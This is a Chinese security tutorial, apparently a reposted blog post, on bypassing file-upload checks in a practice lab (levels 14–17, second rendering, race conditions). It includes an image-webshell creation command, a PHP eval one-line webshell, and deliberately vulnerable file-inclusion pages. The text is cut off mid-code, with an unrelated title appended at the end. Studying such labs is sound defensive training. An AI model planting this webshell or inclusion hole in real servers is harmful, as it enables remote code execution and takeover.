文件上传内容逻辑数组绕过
Posted 在下小黄
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了文件上传内容逻辑数组绕过相关的知识,希望对你有一定的参考价值。
大家好!
我是小黄,很高兴又跟大家见面啦 !
拒绝水文,从我做起 !!!!
今天更新的是:
- 文件上传内容逻辑数组绕过
- 微信公众号回复:【
靶机
】,即可获取本文全部涉及到的工具。
创建时间:2021年6月29日
软件: MindMaster Pro、kali
文件上传内容逻辑数组绕过
前言:思维导图中的内容及其他、解析漏洞、CVE漏洞等
一、图片马:
图片马:
- 就是在一张正常图片里面加入脚本语言代码。
图片一句话木马制作方法:
copy 1.png /b + shell.php /a webshell.jpg
copy 你准备的图片 /b + 一句话木马代码 /a 生成的木马图片
第14关:上传图片马进行绕过
<?php
function getReailFileType($filename){
// 以只读方式打开一个二进制文件。
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
// 从二进制字符串对数据进行解包
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
// 调用函数判定文件类型
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
?>
制作图片马:
<?php @eval($_POST[x]); ?>
- 插入制作的一个动图录像。
利用方法:
- 文件包含漏洞:直接将包含的文件来后门的格式进行执行,就是以当前文件包含脚本来进行执行。
- 打开文件包含地址,
- 这个文件包含代码也很简单。(自己编的,emmm…有点儿bug)
<?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
// 接收这个 file 参数 传递给 file
$file = $_GET['file'];
if(isset($file)){
// 然后用 include 函数来包含这个文件
include $file;
}else{
show_source(__file__);
}
?>
// 利用方法:
URL ?file = /upload/文件名称.png
- 先做文件包含漏洞的简单页面放到网站目录下面。(网上找的)
<?php
if(isset($_GET['path']))
{
include $_GET['path'];
}
else
{
echo "please input the 'path' as parameter whit your file";
}
?>
##include.php
<?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
include $file;
}else{
show_source(__file__);
}
?>
二、文件头检测:
图像文件信息判断:第15题
- getimagesize 函数详解:
- 上一关是读取文件前两个字节的数据,用于判断文件类型,这一关时候使用了php中的getimagesize函数,获取到图片的信息,再取出其文件后缀名进行对比。相当于是把上一关所写的函数封装起来了。
<?php
function isImage($filename){
$types = '.jpeg|.png|.gif';
if(file_exists($filename)){
// getimagesize 函数 获取图片信息,这个函数相当于限制了图片类型。只有上传图像,才正常。
$info = getimagesize($filename);
$ext = image_type_to_extension($info[2]);
if(stripos($types,$ext)>=0){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
?>
第16题 :php内置函数获取图片类型 - exif_imagetype
<?php
function isImage($filename){
//需要开启php_exif模块
// 必须要满足是图片才行。
$image_type = exif_imagetype($filename);
switch ($image_type) {
case IMAGETYPE_GIF:
return "gif";
break;
case IMAGETYPE_JPEG:
return "jpg";
break;
case IMAGETYPE_PNG:
return "png";
break;
default:
return false;
break;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
?>
第17关:
- 这一关 有点奇怪,用5.2.17会上传出错,于是切换版本到5.3.29,上传内容为phpinfo的图片,上传成功,第十五关还能用的图片,到这儿就给你报错了。(唉,这个文件上传真是做得让人头皮发麻,切换个版本,原本能用的图片马又不能用了,要给你报错。
- imagecreatefromjpeg 判断jpg图片函数。
- imagecreatefrompng 判断png图片函数。
- imagecreatefromgif 判断gif图片函数。
<?php
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=UPLOAD_PATH.'/'.basename($filename);
// 获得上传文件的扩展名
$fileext= substr(strrchr($filename,"."),1);
//判断文件后缀与类型,合法才进行上传操作
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "该文件不是jpg格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".jpg";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagejpeg($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "png") && ($filetype=="image/png")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefrompng($target_path);
if($im == false){
$msg = "该文件不是png格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".png";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagepng($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "gif") && ($filetype=="image/gif")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromgif($target_path);
if($im == false){
$msg = "该文件不是gif格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".gif";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagegif($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else{
$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
}
}
?>
- 以上这些关卡,都是利用文件上传漏洞加上文件包含(本地包含,远程包含)漏洞来实现的。
- 如果只能绕过文件上传,上传文件没有其余漏洞进行配合的话是没有意义的。
逻辑安全 = 二次渲染
- 图片上传之后呢,可以进行图片的放大、缩小、保存、删除等操作。像这种案例就涉及到二次渲染,先将图片上传到服务器
- CMS 的头像
<?php
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
// 取出后缀名
$file_ext = substr($file_name,strrpos($file_name,".")+1);
// 这里没有验证文件,
$upload_file = UPLOAD_PATH . '/' . $file_name;
// 移动文件,将前者移动到后者
if(move_uploaded_file($temp_file, $upload_file)){
// 这里进行文件验证,将两个后缀名进行比对。
if(in_array($file_ext,$ext_arr)){
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
unlink($upload_file);
}
}else{
$msg = '上传出错!';
}
}
?>
逻辑安全 - 条件竞争
- 我们把关键词打印出来出来,分析一下源码
<?php
include '../config.php';
include '../head.php';
include '../menu.php';
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES[Alamofire 文件上传出现错误“JSON 文本未以数组或对象开头,并且允许未设置片段的选项”